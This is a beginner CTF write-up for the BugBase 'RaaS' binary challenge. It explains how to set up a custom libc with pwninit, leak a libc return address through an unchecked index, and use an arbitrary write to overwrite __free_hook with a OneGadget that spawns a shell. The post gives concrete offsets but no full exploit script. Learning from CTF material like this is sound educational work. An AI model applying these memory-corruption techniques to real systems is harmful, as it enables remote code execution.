BugBase - RaaS
A beginner-friendly introduction to heap-related CTF challenges.
Last updated
A beginner-friendly introduction to heap-related CTF challenges.
Last updated
First of all, I don't usually post write-ups for CTF challenges because there's often an abundance of existing write-ups for the challenges I am capable of solving (i.e. the most easy ones).
However, after lots of CTFs having to skip the binary challenges that include a malloc
and free
because I wouldn't even know what to do with the libc
DLL, during the BugBase CTF, I finally decided to take some time to learn about the heap and how to approach this sort of challenge.
In the end, I wasn't able to solve the challenge in time - and ironically, it's not even a heap exploitation - but I finally got around to learn the process of analysing this type of challenge.
And since that's something rarely found in any other writeup, I'll share all my steps here with the hope that it may prove useful to others.
Below you can find the challenge files (courtesy of the challenge author @J43G3R):
First things first, after running strings
on the binary we'll simply execute it:
Well, that didn't print out a flag. Instead, it appears that we can enter some strings before being dropped into a typical menu that allows us to view, edit and delete those strings. Finally, we can also exit after entering another string and rating the service.
Okay, time to whip out our favourite decompiler or disassembler, whatever floats your boat, and statically analyse the code of this program. I'll be using Ghidra here.
This write-up does not focus on reverse engineering, so I'll only highlight the interesting bits and pieces - the rest is left as an exercise for the reader.
After renaming and retyping some of the variables in the code, we can start to make sense of the variables that are placed on the stack during the main
function. Ghidra displays them like this:
Note that Ghidra uses the annotation Stack[-0x38]
to indicate the location of the variable right at the entry of the function. In this case, reviewPtrArray
will be stored 56 (0x38) bytes below the stack pointer at the time of entering the main
function. Keep in mind that the function starts by pushing the previous frame pointer onto the stack and uses the new stack pointer value as new frame pointer. This will be important later.
Should any of this sound weird to you, feel free to check out my Buffer Overflow article where I explain the 32bit stack in more detail. Here we are on a 64 bit system but the concepts remain the same.
Not wasting any time, I have marked three variables that may seem important to us: a string array that seems to store review pointers, a 32 character string that holds the product names and a final string called storeName
. They are contiguous on the stack and should we be able to overflow one of them we might control the other.
Analyzing the first few lines, we find the loop that let's us add 4 reviews right at the start.
Okay, so the program is dynamically allocating 48 bytes for each review and stores the 4 names (each maximum 8 characters long) in the productNameArray
filling out the 32 bytes we saw.
Next, we look at what we can do with the menu options. Here, two of them stand out:
Looking at menu option 1 (view), we can see that no index check is performed before our input is used to calculate the address of the string that will be printed out (right side, red box).
Now, being able to read memory potentially allows us to read addresses that will later help us to defeat ASLR. So we'll definitely keep that option in mind.
Option 2 (edit) looks almost identical to option 1. Only that here the index must be below 4 and instead of reading from the calculated address, we can write to it (read(0,<address>,8)
reads 8 bytes from stdin and writes them to <address>
).
Noticed how we can specify negative values for the reviewIndex
? Basically, this enables us to write arbitrary 8 bytes to the memory below the productNameArray
.
Well, what about the adjacent pointer, storeName
? We saw that it's right below the productNameArray
and if we pay attention to the last few lines of codes, we can see that we can extend that write to any address we want:
If we were to use menu option 2 to overwrite the storeName
with an address, we could later use the line in the red box to write 8 bytes to that address, effectively allowing us to write 8 bytes to any address we want.
Initially, this is where I would get stuck because I was unsure where I should write what and how I could turn any of that into RCE. Additionally, I hadn't even touched the LIBC DLL yet, what's up with that? Let's get into that.
Alright, we've identified some flaws in the program - now let's get cracking. First of all, let's deal with the libc.so.6
.
Whenever you write and compile a C program, chances are you're using some existing functions like printf
. But you've never defined that function yourself, have you? That's because it's part of the C standard library, short: libc. This library will be linked at runtime by a run time linker, basically loading the library dynamically into memory so that the program can access the library functions.
As with every other program and library, there are different versions and implementations of libc out there. So when the challenge author hands out a specific C library, it's safe to assume that we'll need that exact libc version/implementation for our exploit.
When we simply execute the binary, it automatically links against our installed standard library. In terms of functionality, this won't make a difference: malloc
(also a libc function) will always reserve memory and printf
will always print a string. But internal implementations and addresses of functions may very well differ.
Enough with the theory, what do we do with the library?
First of all, in order to analyse the binary together with the right library, we'd have to patch the binary to use a linker whose version matches the one of the library. Using strings
, Google and patchelf
that could be achieved manually. Then we could set the environment variable LD_PRELOAD
to the location of our custom library and finally execute the program. One example for that process would be this (otherwise unrelated) writeup.
Fortunately, we don't have to do these steps manually, as there's a tool that does all of that for us. However, I thought it may be good to know what that tool actually does.
Introducing pwninit
:
Either download a release binary or build the tool from source and you are ready to go. Place the two challenge files into the same directory, and simply call pwninit
.
Though pwninit
comes with lots of options and flags, simply calling it in the directory with the libc library and binary will do all the heavy lifting for us and create a new binary for us called RaaS_patched
.
Now let's see what's different. When we execute the patched binary, everythings looks the same. But if we look at the memory mappings for the patched binary, we can see that now the custom libc
is being used instead of the default one.
Feel free to compare the output of the patched binary with the output of the original binary.
You may ask yourself, why we would need to leak an address if /proc/<process pid>/maps
shows all the addresses (we can see the heap, the libc and the stack). Try to restart the binary and view the memory mapping again - the addresses will change, the direct result of ASLR.
Okay fine, we have libc setup - what's next?
Since our final goal is remote code execution, we are looking for some way to redirect code execution and spawn a shell. However, we've seen that ASLR causes the address layout to be different each time, basically rendering hardcoded addresses useless.
If we could manage to extract any libc address from the program during runtime though, we could then simply work with offsets from that address to pinpoint gadgets and other useful locations in the library.
And that's exactly what we'll achieve with the vulnerability identified in the menu option 1. Quick recap, we can print a string value at any memory address from:
productNameArray + <input> * 8
If we remember Ghidra's variable output, we saw that productNameArray
is at Stack[-0x58]
(or directly in the assembler code: RBP-0x50
). And if you know your C calling conventions, you'll remember what address should be stored directly above the RBP
: the return address of the current function.
The main
function in C is actually called by another function called __libc_start_main
which, as you may have guessed, is a libc
function. Hence, the return address of main
will be an address pointing to the next assembler instruction after the call
from within libc
.
So, productNameArray + 11 * 8
should print the return address (11*8 = 88 = 0x58
).
We can leak the return address with menu option 1 and entering 11 for the index.
We'll put together the exploit only in the end to save some time and space.
But how do we get the actual libc
base address from only that address now? Let's use gdb
.
First, we set a breakpoint in the main function and run the program. Immediately, we hit the breakpoint and look at the return address on the stack (RBP+8
). That's the value we will leak with the menu option 1 later. We can then ask gdb
to disassemble the code at that address and it turns out that we were right and the address does indeed belong to the function __libc_start_main
.
Next, let's see the memory mapping of the program in gdb
:
The libc
is loaded into memory starting at address 0x7ffff7dd5000
. The return address points to 0x7ffff7df9083
. Therefore, subtracting the difference from the leaked address will give us the current libc
base address. The difference is 7ffff7df9083 - 0x7ffff7dd5000 = 0x24083
.
The offset from the leaked address to the libc
base is 0x24083.
Alright, we got the libc
base address, what now?
__free_hook
As we've found out earlier, we can overwrite any address we want with 8 bytes.
One possible option is to overwrite a libc
function hook. Basically, the libc
version we're given provides several hooks that allow programmers to modify the behavior of existing functions. See this man page for more details. Note that these are deprecated in newer versions of libc.
One of these hooks is called __free_hook
, a function pointer that will be accessed whenever free
is called. And this is exactly what happens right before our program closes (free(storeName)
).
In gdb
we can use print $__free_hook
to print the address of that value.
Using the determined libc
base address, we can calculate the offset of __free_hook
to the base with: 0x7ffff7fc3e48 - 0x7ffff7dd5000 = 0x1eee48
.
The offset from the __free_hook
to the libc
base is 0x1eee48.
On to the final part, what are we going to write to that address?
Introducing OneGadget. In essence, OneGadget allows us to find sequences of useable assembler instructions that will do all the work for us and spawn a shell. This is possible, because the libc
library may very well already contain code for this sort of action.
Once we installed it, we can run it on our given library:
OneGadget will display the offsets from the libc
base and also show constraints for each gadget. So before we are going to use one of them, let's see which one matches all constraints.
For this purpose, we add a breakpoint right before the finalfree
is executed and analyse the registers using gdb
:
As we can see, r12
contains some value instead of NULL, meaning the constraints for the first gadget are not met. However, we fulfill the criteria for the other two gadgets, so let's try using the one-gadget with an offset of 0xe3b01
.
Though 0xe3b04 appears to be a match as well, it did not work for me. So keep in mind to try different gadgets should the final shell fail (or dive deeper to reliably validate the constraints).
We've successfully identified a suitable one-gadget at offset 0xe3b01.
So the idea of our final exploit becomes:
Leaking an address from the stack to calculate the libc
base address
Overwrite a pointer on the stack to point to the __free_hook
pointer
With the final read
operation we can write the address of a one-gadget to the __free_hook
pointer
When the final free
is called, execution will continue at the one-gadget and spawn a shell
This writeup focused on setting up and analyzing a binary challenge with a custom libc version. Writing the exploit is now just a matter of stitching all the pieces together using Python and pwntools
.
We've successfully exploited "Review as a Service" by leaking a libc address and overwriting the __free_hook
, ultimately gaining RCE.
Alright , this concludes our journey into my first binary almost-heap challenge. In the end, we did not exploit the heap at all but I believe that the knowledge gained during this challenge can easily be transferred to get started with other binary and actual heap challenges. The setup and analyzing process remains mostly the same and knowledge of libc is generally required in order to understand and exploit the heap.
If you want to learn about the heap, I can recommend the Azeria Labs articles but as always there will be a lot of googling and stitching infomation together from various resources, such as my own heap layout infographic (shameless self plug).
Finally, I want to give a huge shoutout to the challenge author @J43G3R over at the BugBase discord, who supported me even after the CTF had ended by answering my questions and sharing his valuable knowledge!
If you got any feedback or questions, feel free to reach out via discord or smash one of the smiley faces below.